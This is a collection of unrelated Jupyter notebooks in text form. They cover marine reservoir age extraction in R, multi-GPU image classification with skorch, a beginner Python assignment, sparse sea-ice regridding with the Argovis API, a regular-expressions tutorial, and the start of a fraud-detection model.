# Lets say that you want to extract the marine reservoir ages at a specific location for which you have the longitude, latitude and depth (e.g. -55oN, -70oE, 3000m). The following is the code for how to extract such data.
#Lets have a look at the matrix containing the variable of interest. In this case marine reservoir ages ("MRA)
nc_var <- ncvar_get( nc, varid="MRA" )
#list how many dimensions the matrix has
dim(nc_var)
#Note how this compares to the number of entries in each dimension
length(nc$dim$lon$vals)
length(nc$dim$lat$vals)
length(nc$dim$depth$vals)
# +
#The matrix containing our variable is made up of the following [lon,lat,depth]
#Lets try to extract the data for our core site
#First define the variables
input_lat = -55.1
input_lon = -70
input_depth = 1250
#Now find the location in the matrix that corresponds to our data.
#It is likely that your core is not at the exact location as each data point in the cdf file,
#so you will have to find the nearest grid point
#Find correct colours for Interpolated_masterfile
nc_lat<-nc$dim$lat$vals
nc_lon<-nc$dim$lon$vals
nc_depth<-nc$dim$depth$vals
#This is written in a loop to make it easier when you have more than one site
index_vals=NULL
for(i in 1:length(input_lat)){
lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i])))
#longitudes may need correcting from -180 to 180 ---> 0 to 360
input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i])
lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2)))
depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i])))
a<-data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index)
index_vals<-rbind(index_vals,a)
}
index_vals
#Now use these index values to find the RMA at the core site by using the variable matrix
MRA_output=NULL
for(i in 1:nrow(index_vals)){
MRA<-nc_var[index_vals$lon_index[i],index_vals$lat_index[i],index_vals$depth_index[i]]
MRA_output<-rbind(MRA_output,MRA)
}
MRA_output
# -
# The same principle can be used to extract marine reservoir ages from multiple sites. You can import in an excel sheet containing all of your longitudes, latitudes and depths, and output the data as a csv file.
#This package lets you read in excel docs
require(gdata)
input_cores<- read.xls("All_chilean_margin_cores.xlsx", sheet=1, header=TRUE)
#See the top few lines of your excel file
head(input_cores)
# +
#Define the input variables
input_lat = input_cores$Lat..oN.
input_lon = input_cores$Long..oE.
input_depth = input_cores$WD..m.
#Again apply the function to find the index locations of each site within the variable matrix
index_vals=data.frame(lat_index=numeric(0),lon_index=numeric(0),depth_index=numeric(0))
for(i in 1:length(input_lat)){
lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i])))
#longitudes may need correcting from -180 to 180 ---> 0 to 360
input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i])
lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2)))
depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i])))
a <- data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index)
index_vals<-rbind(index_vals,a)
}
#Now use these index values to find the RMA at the core site by using the variable matrix
MRA_output=NULL
for(i in 1:nrow(index_vals)){
MRA<-nc_var[index_vals$lon_ind[i],index_vals$lat_ind[i],index_vals$depth_ind[i]]
MRA_output<-rbind(MRA_output,MRA)
}
#Add the output to the original datafile
input_cores["MRA"]<- MRA_output
#Display datafile
input_cores
#Output as csv file
write.csv(input_cores,"input_cores_with MRA.csv")
| Jupyter_notebooks/Extracting_data_from_model_netcdf_and_plotting.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
from urllib import request
from zipfile import ZipFile
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from torchvision import datasets, models, transforms
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
# +
from skorch import NeuralNetClassifier
from skorch.helper import predefined_split
torch.manual_seed(360);
# -
NUM_WORKERS = 16
BATCH_SIZE = 32
for i in range(torch.cuda.device_count()):
print(torch.cuda.get_device_name(i))
# # Load data
# +
def download_and_extract_data(dataset_dir=""):
data_zip = os.path.join(dataset_dir, "hymenoptera_data.zip")
data_path = os.path.join(dataset_dir, "hymenoptera_data")
url = "https://download.pytorch.org/tutorial/hymenoptera_data.zip"
if not os.path.exists(data_path):
if not os.path.exists(data_zip):
print("Starting to download data...")
data = request.urlopen(url, timeout=300).read()
with open(data_zip, "wb") as f:
f.write(data)
print("Starting to extract data...")
with ZipFile(data_zip, "r") as zip_f:
zip_f.extractall(dataset_dir)
print("Data has been downloaded and extracted to {}.".format(dataset_dir))
download_and_extract_data()
# +
data_dir = "hymenoptera_data"
train_transforms = transforms.Compose(
[
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
)
val_transforms = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
)
train_ds = datasets.ImageFolder(os.path.join(data_dir, "train"), train_transforms)
val_ds = datasets.ImageFolder(os.path.join(data_dir, "val"), val_transforms)
# -
class PretrainedModel(nn.Module):
def __init__(self):
super().__init__()
model = models.resnet18(pretrained=True)
num_ftrs = model.fc.in_features
model.fc = nn.Linear(num_ftrs, 2)
self.model = model
def forward(self, x):
return self.model(x)
model = PretrainedModel()
# +
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
# dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
model = nn.DataParallel(model)
model = model.to(device)
# -
net = NeuralNetClassifier(
model,
criterion=nn.CrossEntropyLoss,
lr=0.001,
batch_size=BATCH_SIZE,
max_epochs=25,
# module__output_features=2,
optimizer=optim.SGD,
optimizer__momentum=0.9,
iterator_train__shuffle=True,
iterator_train__num_workers=NUM_WORKERS,
iterator_valid__shuffle=True,
iterator_valid__num_workers=NUM_WORKERS,
train_split=predefined_split(val_ds),
device=device, # comment to train on cpu
)
net.fit(train_ds, y=None);
| skorch-multi-gpu.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
for x in range(1,100):
if x%3 == 0 and x%5 == 0:
print ("DogCat")
elif x%5 == 0:
print ("Cat")
elif x%3 == 0:
print ("Dog")
else:
print (x)
import random
num = random.randint(1,100)
print (num)
import random
num = random.randint(1,100)
print(num)
if num > 100 or num < 1:
print ("Out of Bounds")
a=input()
if a in range(num+10) or a in range(num-10):
print("Warm!")
else:
print("Cold!")
import random
num = random.randint(1,100)
if num > 100 or num < 1:
print ("Out of Bounds")
a=input()
print(num)
if a in range(num+10) or a in range(num-10):
print("Warm!")
else:
print("Cold!")
import random
num = random.randint(1,100)
a=input()
print(num)
if a > 100 or a < 1:
print ("Out of Bounds")
elif a in range(num+10) or a in range(num-10):
print("Warm!")
else:
print("Cold!")
| Assignment.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python argo
# language: python
# name: argo
# ---
# # Make Non-Uniform Sparse Data Maps In Python
#
# Lately, I have been working with gridded data sets. Climate scientists and oceanographers have been fervently creating gridded data sets using satellite and in situ data that are released. For example, see the [Argo gridded product page](https://argo.ucsd.edu/data/argo-data-products/) for ocean grids, [Here for precipitation](https://gpm.nasa.gov/data). There is also vector grids available for wind [CCMP Wind Vector Analysis Product](http://www.remss.com/measurements/ccmp/). [The Interactive Multisensor Snow and Ice Mapping System (IMS)](https://www.natice.noaa.gov/ims/) is another great example.
#
# Grids do not have to be global such as the [Southern Ocean State Estimate (IMS)](http://sose.ucsd.edu/).
#
# I am working on making a [gridded product](https://www.itsonlyamodel.us/mle-gradient-derivation.html).
#
# Gridded data is usually saved as TIFF files and there are many tools available to work with these images. However, TIFF files assume the gridded data is uniform, that the latitude spaces are all the same as longitude. the IMS and SOSE grids are not non-uniform and have to be re-gridded (interpolated on a uniform grid).
#
# ## Argovis grid module
#
# [Argovis](https://argovis.colorado.edu/ng/grid?presLevel=0&date=2013-01-01&shapes=%5B%5B-40,-70,0,-30%5D%5D&gridName=sose_si_area_1_day_sparse&interpolateBool=false&colorScale=ice&inverseColorScale=false¶mMode=false¶m=SIarea&gridDomain=%5B0,0.82%5D) has visualization and data delivery capabilities for a few of gridded products, Including SOSE Sea-Ice coverage percentage, shown below.
#
# 
#
# There is very little ice in the domain covered by SOSE, making this dataset sparse. The MongoDB database stores the data for only grid cells that contain sea-ice, making the data payload $\frac{1}{5}$ the size otherwise. Visualizing the grid on Argovis requires the grid to be de-sparsed and re-gridded to be uniform rectangular. The Leaflet map uses the [Leaflet CanvasLayer](https://github.com/tylertucker202/Leaflet.CanvasLayer.Field) plugin. This plugin extends the leaflet map to include HTML canvas elements of uniform gridded data.
#
# ## Implementation of Regridding
#
# I am going to show you how gridded data is output the MongoDB, and how the front end charts the non-uniform data on Argovis. Although Argovis implements this using Typescript, this notebook uses Python. The process is identical.
import requests
import pandas as pd
import numpy as np
from scipy.interpolate import griddata
import cmocean
import matplotlib.pylab as plt
from scipy.interpolate import griddata
from scipy import interpolate
import itertools
import pdb
import cartopy.crs as ccrs
# 1. We make two API calls. One is for the sparse data, the other is for the grid points falling within the lat-lon window. The function calls to the API below. By the way, I wrote this [API documentation](https://argovis.colorado.edu/api-docs/) using swagger. You can see in more detail what each API call outputs. Swagger gives examples, and even lets you make API calls of your own!
# +
def get_grid(gridName, latRange, lonRange, date, presLevel):
url = 'https://argovis.colorado.edu/griddedProducts/nonUniformGrid/window?'
url += 'gridName={}'.format(gridName)
url += '&presLevel={}'.format(presLevel)
url += '&date={}'.format(date)
url += '&latRange={}'.format(latRange)
url += '&lonRange={}'.format(lonRange)
url = url.replace(' ', '')
# Consider any status other than 2xx an error
print(url)
resp = requests.get(url)
if not resp.status_code // 100 == 2:
return "Error: Unexpected response {}".format(resp)
grid = resp.json()
return grid[0]
def get_grid_coords(gridName, latRange, lonRange):
url = 'https://argovis.colorado.edu/griddedProducts/gridCoords?'
url += 'gridName={}'.format(gridName)
url += '&latRange={}'.format(latRange)
url += '&lonRange={}'.format(lonRange)
url = url.replace(' ', '')
# Consider any status other than 2xx an error
print(url)
resp = requests.get(url)
if not resp.status_code // 100 == 2:
return "Error: Unexpected response {}".format(resp)
grid = resp.json()
return grid[0]
# -
latRange=[-70, -65]
lonRange=[0, 40]
gridName='sose_si_area_1_day_sparse'
date='2013-01-04'
presLevel=0
grid = get_grid(gridName, latRange, lonRange, date, presLevel)
gridCoords = get_grid_coords(gridName, latRange, lonRange)
# 2. We define our uniform grid. We space it horizontally by $\frac{1}{4}$ and vertically by $\frac{1}{2}$.
lats = np.array(gridCoords['lats'])
lons = np.array(gridCoords['lons'])
dx, dy = .25, .5
x = np.arange(min(lons), max(lons), dx)
y = np.arange(min(lats), max(lats), dy)
xi, yi = np.meshgrid(x, y)
# 3. Desparse the non-uniform grid. Remember we interpolate our uniform grid with coordinates.
xv, yv = np.meshgrid(lons, lats)
ice = np.zeros(xv.shape)
lngLat = []
vals = []
for row in grid['data']:
lat_idx = np.where(lats == row['lat'])
lon_idx = np.where(lons == row['lon'])
ice[lat_idx, lon_idx] = row['value']
lngLat.append((row['lon'], row['lat']))
vals.append(row['value'])
# 4. Interpolate the de-sparsed grid onto the uniform grid.
#
# Some thought needs to go into how we interpolate. We can 'cheat' by using Scipy's interpolate function. Interpolate uses Delaunay triangles to create a mesh and interpolates based on this mesh. The source code points to a class [LinearNDInterpolator](https://github.com/scipy/scipy/blob/v1.5.2/scipy/interpolate/interpnd.pyx) that uses [Qhull](http://www.qhull.org/). If we were to do this on the front end, we would have to write this routine in Typescript. Instead, I wrote a simpler algorithm that takes advantage of the rectangular structure of our grid. We will compare the two.
grid_cheat = griddata(lngLat, vals, (xi, yi), method='linear')
# Our algorithm uses a nearest neighbor binary solver. Each interpolated point searches for the four surrounding points of the non-uniform grid and does a bilinear interpolation.
# +
def find_closest_idx(arr, target):
arrLen = len(arr)
# Corner cases
if (target <= arr[0]):
return (0, 1)
if (target >= arr[arrLen - 1]):
return [arrLen - 1, -1]
# Doing iterative binary search
idx = 0; jdx = arrLen-1; mid = 0
while (idx < jdx):
mid = int((idx + jdx) / 2)
if (arr[mid] == target): # target is midpoint
return (mid, 1)
if (arr[idx] == target): #target is left edge
return (idx, 1)
if (target < arr[mid]): # search to the left of mid
# If target is greater than previous
# to mid, return closest of two
if (mid > 0 and target > arr[mid - 1]):
return get_closest_idx(arr[mid - 1], arr[mid], mid-1, target)
# Repeat for left half
jdx = mid
else: # search to the right of mid
if (mid < arrLen - 1 and target < arr[mid + 1]):
return get_closest_idx(arr[mid], arr[mid+1], mid, target)
idx = mid + 1
# Only single element left after search
return [mid, 1]
def get_closest_idx(val1, val2, val1_idx, target):
if (target - val1 >= val2 - target):
return (val1_idx+1, -1)
else:
return (val1_idx, 1)
# -
# Here is an example that shows what is going on for a single interpolation point.
# +
iPoint = (14, -68.7777) # Example interpolation point
def find_surrounding_points(iPoint, print_me=False):
lat_idx, lat_shift = find_closest_idx(lats, iPoint[1])
lon_idx, lon_shift = find_closest_idx(lons, iPoint[0])
llPoint = (lons[lon_idx], lats[lat_idx], ice[lat_idx, lon_idx])
lrPoint = (lons[lon_idx+lon_shift], lats[lat_idx], ice[lat_idx, lon_idx+lon_shift])
urPoint = (lons[lon_idx+lon_shift], lats[lat_idx+lat_shift], ice[lat_idx+lat_shift, lon_idx+lon_shift])
ulPoint = (lons[lon_idx], lats[lat_idx+lat_shift], ice[lat_idx+lat_shift, lon_idx])
points = [llPoint, lrPoint, urPoint, ulPoint]
if print_me:
print(f'interpolated point: {iPoint}')
print(f'lat_idx: {lat_idx}, lon_idx: {lon_idx}')
print(f'lats[lat_idx]: {lats[lat_idx]}, lons[lon_idx]: {lons[lon_idx]}')
print(f'lats[lat_idx+lat_shift]: {lats[lat_idx+lat_shift]}, lons[lon_idx+lon_shift]: {lons[lon_idx + lon_shift]}')
x, y = [point[0] for point in points], [point[1] for point in points]
return (points, (x, y))
points, (x, y) = find_surrounding_points(iPoint, True)
# -
# Below is a diagram of the points found by the nearest neighbor algorithm.
# +
def plot_interpolation_point(x, y, iPoint, loc="lower center"):
fig = plt.figure(figsize=(8,8))
ax = plt.axes()
ax.scatter(x, y, label='surrounding data')
ax.scatter(iPoint[0], iPoint[1], label='interpolation point')
ax.set_title('Interpolation point and surrounding data')
ax.set_ylabel('lat')
ax.set_xlabel('lon')
ax.legend(loc=loc)
plot_interpolation_point(x, y, iPoint)
# -
# Our interpolation point (orange) lies on or within our non-uniform grid points (blue). The bilinear interpolation function is as follows.
# +
def bilinear_interpolation(x, y, points):
'''Interpolate (x,y) from values associated with four points.
The four points are a list of four triplets: (x, y, value).
The four points can be in any order. They should form a rectangle.
>>> bilinear_interpolation(12, 5.5,
... [(10, 4, 100),
... (20, 4, 200),
... (10, 6, 150),
... (20, 6, 300)])
165.0
'''
# See formula at: http://en.wikipedia.org/wiki/Bilinear_interpolation
points = sorted(points) # order points by x, then by y
(x1, y1, q11), (_x1, y2, q12), (x2, _y1, q21), (_x2, _y2, q22) = points
if x1 != _x1 or x2 != _x2 or y1 != _y1 or y2 != _y2:
raise ValueError('points do not form a rectangle')
if not x1 <= x <= x2 or not y1 <= y <= y2:
raise ValueError('(x, y) not within the rectangle')
return (q11 * (x2 - x) * (y2 - y) +
q21 * (x - x1) * (y2 - y) +
q12 * (x2 - x) * (y - y1) +
q22 * (x - x1) * (y - y1)
) / ((x2 - x1) * (y2 - y1) + 0.0)
print(bilinear_interpolation(iPoint[0], iPoint[1], points))
# +
iPoints = [ (xi.flatten()[idx], yi.flatten()[idx]) for idx in range(len(xi.flatten()))]
iGrid = []
for iPoint in iPoints:
points, (_, _) = find_surrounding_points(iPoint)
iVal = bilinear_interpolation(iPoint[0], iPoint[1], points)
iGrid.append(iVal)
iGrid = np.array(iGrid).reshape(xi.shape)
# -
iGrid.shape
# ## Comparison
#
# Our Algorithm follows the ocean contours rather well, yet there is still some overlap. A land mask would help prevent this grid from reporting ice on land. See the map below.
map_proj = ccrs.AzimuthalEquidistant(central_latitude=-90)
fig = plt.figure(figsize=(10,10))
ax = plt.axes(projection=map_proj)
ax.contourf(xi, yi, iGrid, 60, transform=ccrs.PlateCarree(), cmap=cmocean.cm.ice)
ax.coastlines()
# Scipy's interpolation reports ice over sea regions where there should not be any, as seen by the lighter blue 'fingers' in the figure below. Delaunay triangles are connecting ice sheets that do not reflect what the data reports.
fig = plt.figure(figsize=(10,10))
ax = plt.axes(projection=map_proj)
ax.contourf(xi, yi, grid_cheat, 60, transform=ccrs.PlateCarree(), cmap=cmocean.cm.ice)
ax.coastlines()
# # Final remarks
#
# We have seen that regridding can introduce artifacts that are not there using Delaunay triangulation. Taking advantage of the non-uniform grids' rectangular structure helps prevent this from happening. The inclusion of a land mask would help eliminate sea ice over land artifacts. I am considering adding a land mask in later iterations of the Argovis grid module that would take care of this.
#
# For gridded product comparison, regridding on the browser also provides a means to compare two separate grids, where one grid is interpolated using the coordinates of another. While useful, interpolation should be used with caution. Interpolation can introduce artifacts.
#
# A final remark: regridding is a necessary step when making charts, but does add overhead for regridding. Though it is written in typescript, It may be faster to implement some or all of the nearest neighbor algorithm in another language like Rust or C++ and convert it over to Web Assembly.
#
# It has been a pleasure writing this article. I hope you find it useful, or at least entertaining!
| gridding/make_non_uniform_sparse_grids_in_python.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <h4>Unit 1 <h1 style="text-align:center"> Chapter 1</h1>
#
# ---
import re
import logging
from importlib import reload
reload(logging)
import sys
logging.basicConfig(format='Explanation | %(levelname)s : %(message)s', level=logging.INFO, stream=sys.stdout)
log = logging.getLogger("Zero to Hero in NLP")
#
# ### Regular Expressions
# > Regular expressions can be used to specify pattern of strings we might want to extract from a document.
#
# ### Text Normalization
# > Text normalization is a set of tasks used to convert text into a more convenient, and standard form.
#
# * <strong>Tokenization</strong>
# * A method to seperate words from running texts.<br>
#
# *But tokenization is much more than just seperating words*<br>
#
# * For processing tweets or texts we’ll need to tokenize emoticons like :) or hashtags like #nlproc.
# ---
# * <strong>Lemmatization</strong>
# * The task of determining that two words have the same root, despite their surface differences. For example, sang, sung, sing have the same root <strong>sing</strong>.
# ℹ️ The word *sing* is known as a <strong>lemma</strong>
# ---
# * <strong>Stemming</strong>
# * Stemming refers to a simpler version of lemmatization in which we mainly just strip suffixes from the end of the word.
# ---
# * <strong>Sentence segmentation</strong>
# * Sentence segmentation is the method of breaking up individual sentences using cues like point(.), exclamation mark(!) and more.
# ---
#
# ### Edit Distance
# > Edit distance a metric that measures similarity between two strings based on the number of edits(insertion, deletion, substitution).
#
# ---
#
#
# <span style="color:red">English words are often seperated by whitespaces, but it's not always the case. For example, 'New York' & 'rock 'n' roll' shall be treated as single large words rather than splitting on *New* & *York*. A good reason to not rely on python's split() method for tokenization</style></span>
# ---
# <h2 style="text-align:center">Regular Expressions</h2>
# * Regular expressions are useful when we have a *pattern* to search within a *corpus* of text.
# <br>
# ---
# <strong>Corpus</strong> - A collection of documents or a single document.
#
# ---
# <br>
#
# * A regular expression search function will search through the corpus, returning all texts that match the pattern.
# * Here, regular expressions are delimited by backslashes(/).
# ---
# A simple regular expression would be a sequence of characters.
# For example, /woodchuck/, /buttercup/
#
# > Couple of things to pay attention to.
#
# * Regular expressions are case-sensitive. 'Woodchuck' does not match the regex /woodchuck/
# * Note how the regex is delimited by /.
#
# #### Square brackets [ ]
#
# > The string of characters inside square braces denote <strong>disjunction</strong> of characters to match. In other words, specifies an OR condition.
#
# For example,
#
# /[wW]oodchuck/ - This regex matches <strong>w</strong>oodchuck or <strong>W</strong>oodchuck.<br>
#
# /[abc]/ - Matches sequence having <strong>a</strong>, <strong>b</strong>, or <strong>c</strong>. Matches 'Hi my n<strong>a</strong>me is John', but not 'A good night'
# #### Dash -
#
# > Characters seperated by dash denote a range.
#
# For example,
#
# /[2-5]/ - A range of 2 to 5. 2, 3, 4, or 5.<br>
#
# /[a-z]/ - A range of lowercase English alphabets. a,b,c,...,z. Matches '<strong>a</strong> good day.'<br>
#
# /[A-Z]/ - A range of uppercase English alphabets. A,B,C,...,Z. Matches '<strong>B</strong>est day of my life.'<br>
# #### Caret ^
#
# > If caret is the first character inside a square bracket, the sequence after it is negated. In other words, all the characters are matched except the ones after caret.
#
# For example,
#
# /[^A-Z]/ - Matches lowercase letters but not uppercase. Matches 'I WAS GOING TO <strong>t</strong>he market'.<br>
#
# /[^Ss]/ - Neither S nor s. Matches '<strong>I</strong> had a bad day.'<br>'S<strong>o</strong>metimes I wish to escape'.<br>
#
# /[A-Z]/ - A range of uppercase English alphabets. A,B,C,...,Z. Matches '<strong>B</strong>est day of my life.'<br>
# #### Question mark ?
#
# > If specified after a character, it says match or nothing. In other words character before ? is optional
#
# For example,
#
# /[woodchucks?]/ - Matches with string either having 's' after woodchuck or not at all. Matches woodchuck or woodchucks<br>
#
# /[colou?r]/ - Matches with string either having 'u' in colour or not having 'u' at all. Matches color or colour.<br>
#
print(re.findall(r'[Ss]ome','sometimes I feel very energetic. Somedays not.'))
log.info(' Matches Some and some')
log.info("The findall() method returns all the words that match a pattern in a corpus. search() returns the first point of match")
print(re.findall(r'h[abc][vd]','I have had a good day in the cabin ha of my backyard.'))
log.info(' Matches words starting with h, having a,b, or c and ending with v or d')
print(re.findall(r'[A-Z]','This is the Besttttt day of my Liffeee'))
log.info(' Matches uppercase letters.')
print(re.findall(r'[^A-Z]','This is the Besttttt day of my Liffeee'))
log.info(' Matches everything except uppercase letters.')
print(re.findall(r'[^T]','This is the Besttttt day of my Liffeee'))
log.info(' Matches everything except uppercase T.')
print(re.findall(r'colou?r','Bright colors and colours'))
log.info(' Matches if string has color or colour')
print(re.findall(r'[A-Za-z]unny days?','sunny day vs sunny days vs Sunny day vs Sunny days vs funny day'))
log.info(' Matches if string has anything with unny day or unny days')
# #### Kleene *
#
# > The Kleene star means “zero or more occurrences of the immediately previous character or regular expression”.
#
# For example,
#
# /a*/ - Matches zero or more 'a'. Matches 'baaaaaaa' and 'Hello'<br>
#
# /aa*/ - Matches one or more 'a'. Matches 'baaaaaa' but not 'Hello' because atleast one 'a' should be there<br>
#
print(re.findall(r'a*','Hello'))
log.info(' Zero \'a\' found')
print(re.findall(r'aa*','Hello'))
log.info(' No \'a\' found')
print(re.findall(r'[ab]*','Baaaaaa & aaaaaaa and a'))
log.info('Matches if string has zero or more \'a\' or \'b\' ')
print(re.findall(r'[ab]*','bbbbbb'))
log.info(' Matches if string has zero or more \'a\' or \'b\' ')
# #### Kleene +
#
# > The Kleene + means “one or more occurrences of the immediately previous character or regular expression”.
#
# For example,
#
# /a+/ - Matches one or more 'a'. Matches 'baaaaaaa' but not 'Hello'<br>
#
# /[0-9]+/ - Matches sequence of digits<br>
#
print(re.findall(r'[0-9]+','My phone number is 9457068769'))
log.info(' Matches sequence of digits')
# #### Period .
#
# > The period specifies any single character (wildcard).
#
# For example,
#
# /beg.n/ - Matches for any single character betwee'beg' and 'n'<br>
#
print(re.findall(r'beg.n','begin vs begun vs beg\'n'))
log.info(' Matches anything with "beg" and "n"')
print(re.findall(r't.*d','tday vs timid vs ticked vs topped vs top'))
log.info(' Matches sequence starting with "t" and ending with "d"')
print(re.findall(r'beg.n','It is the beginning'))
log.info(' Matches anything with "beg" and "n"')
# #### Anchors
#
# > Anchors are special characters that anchor regular expressions to particular places in a string.
#
# * ^ (caret) specifies the start of line.
#
# * $ (dollar) matches end of line.
#
# * \b matches a word boundary.
#
# * \B matches a non-word boundary
print(re.findall(r'^The','The is a very common word in English'))
log.info(' Matches if "The" is at the beginning of string')
print(re.findall(r'^the','The is the most common word in English'))
log.info(' Matches if "the" is at the beginning of string. Note that "the" is present but not matched.')
print(re.findall(r'the$','Pattern you are looking for is -> the'))
log.info(' Matches if "the" is at the end of string.')
print(re.findall(r'the$','You are the winner'))
log.info(' Matches if "the" is at the end of string. Notice that "the" is present but not matched')
print(re.findall(r'\bthe\b','the vs other'))
log.info(' Matches words having only "the". Notice that "the" is present in "other" but not matched')
print(re.findall(r'\bthe\b','the vs other'))
# <h2 style="text-align:center">Disjunction, Grouping, & Precedence</h2>
# #### Disjunction operator |
#
# > Disjunction operator is used to search for more than one string. Example, you want to search for "cats" or "dogs". You cannot use /[catsdogs]/, instead use /cats|dogs/
#
# For example,
#
# /cats|dogs/ - This regex matches <strong>cats</strong> or <strong>dogs</strong>.<br>
re.findall(r'cats|dogs','I have two cats and 3 dogs')
re.search(r'cats|dogs','I have two cats and 3 dogs')
print(re.findall(r'[0-9]+|[A-Z]','this will return empty list'))
log.info(" It returns empty list because there are no string of digits or(|) uppercase letters")
print(re.findall(r'[0-9]+|[A-Z]','this will return something because it has num3er5'))
log.info(" It returns where it finds a sequence of one or more digits")
print(re.findall(r'[0-9]+|[A-Z]','this will return something because it has num3er5 as well as UPPERCASE LETTERS'))
log.info(" It returns where it finds a sequence of one or more digits or uppercase letters")
print(re.findall(r'[0-9]+|[A-Z]+','this will return something because it has num3er5 as well as UPPERCASE LETTERS'))
log.info(" Notice the differece in output due to Kleene+")
# #### Precedence ( )
#
# > Enclosing a pattern inside () makes it act like a single character.
#
# For example, <br>
# If you want to match 'guppy' or 'guppies', you can use /gupp(y | ies)/ instead of /guppy | guppies/.
print(re.search(r'gupp(y|ies)','I have a lot of guppies and she has one guppy'))
log.info(" Using search() here to demonstrate. search() returns when the first match is found.")
# ---
#
# <h1 style="text-align:center"> Operator precedence hierarchy</h1>
from prettytable import PrettyTable
table = PrettyTable()
table.field_names = ('Operator Name','Operator')
table.add_row(["Paranthesis", '()'])
table.add_row(["Counters", '* + ? {}'])
table.add_row(["Disjunction", '|'])
print(table)
# * It's easy to miss some strings while using regular expressions because one patterns match may miss another type of pattern.
# ---
#
# > There are two kinds of errors:
#
# * false positives : strings that we incorrectly matched.
# * false negatives, strings that we incorrectly missed.
# Reducing the overall error rate for an application thus involves two antagonistic efforts:
# <br>
#
# • Increasing <strong>precision</strong> (minimizing false positives) <br>
# • Increasing <strong>recall</strong> (minimizing false negatives)
# #### Substitution operator s/
#
# > Substitution operator is used to substitute a regex with a given pattern.
#
#
# For example, <br>
# If you want to substitute 'guppy' with 'guppies', you can use s/guppy/guppies/.
#
# *Python code below*
re.sub(pattern=r'guppy',string='I have 4 guppy',repl='guppies')
# ---
#
# ##### Capture group
#
# > This use of parentheses to store a pattern in memory is called a capture group. Every time a capture group is used (i.e., parentheses surround a pattern), the re- sulting match is stored in a numbered register. If you match two different sets of parentheses, \2 means whatever matched the second capture group.
#
# For example,
#
# /the (.*)er they (.*), the \1er we \2/
#
# The above regex will match 'the faster they ran, the faster we ran' but not 'the faster they ran, the faster we ate'.
# 
# * The first (.)er means anything that ends with er will match and stored in \1er.
# * The second (.) means whatever is stored in (.) will have to match exactly at \2.
re.findall(r'^(?!Volcano)[A-Za-z]+','Volcano has erupted')
# ---
#
# Want to learn regex in depth? Click [here](https://github.com/ziishaned/learn-regex)
| Unit 1 - Introduction/.ipynb_checkpoints/Chapter 1 | Regular Expressions-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:py3k]
# language: python
# name: conda-env-py3k-py
# ---
# + [markdown] nbpresent={"id": "a7289771-729f-48bb-9be7-bd99538fb72a"}
# # Project 3 Fraud Detection Algorithm
# + [markdown] nbpresent={"id": "44d4eb36-ee0e-4070-b455-472afb0f3f4a"}
# ## Load data and data split
# + nbpresent={"id": "3be92b91-7733-4e0b-b0e7-5f48915edeb6"}
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import random
import warnings
warnings.filterwarnings("ignore")
data = pd.read_csv("vars_final_zscale-2.csv", index_col = 0)
# -
data.shape
# + nbpresent={"id": "affacd4e-c4f5-4205-8c3b-ddf001223236"}
data.head()
# + nbpresent={"id": "d26d6714-cef7-4d41-a351-91c541107406"}
# test for NAN
pd.isnull(data).any()
# -
# split data into out of date(after 11/1/10), train and test
oot_df = data.iloc[833508:,:]
trte_df = data.iloc[:833507,:]
train, test = train_test_split(trte_df, test_size=0.2, random_state=0)
oot_df.to_csv('oot.csv',index=True)
train.to_csv('train.csv',index=True)
test.to_csv('test.csv',index=True)
# + nbpresent={"id": "082165ed-e1a2-484a-9477-f19bc7fcc478"}
train.head()
# -
train.describe()
sum(train['fraud_label'])/len(train['fraud_label'])
test.head()
test.describe()
sum(test['fraud_label'])/len(test['fraud_label'])
# + [markdown] nbpresent={"id": "6dd1e682-6841-4836-a4cd-9786c98d6d8d"}
# ## Build algorithm
# + nbpresent={"id": "8ff86ed0-ffa6-4cf9-8314-f3b419fa06ce"}
# split lables and features
train_lab = train["fraud_label"]
train_fea = train.iloc[:,1:]
train_fea.head()
# +
test_lab = test["fraud_label"]
test_fea = test.iloc[:,1:]
test_fea.head()
# +
oot_lab = oot_df["fraud_label"]
oot_fea = oot_df.iloc[:,1:]
oot_fea.head()
# -
# import neccessary packages
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.metrics import confusion_matrix
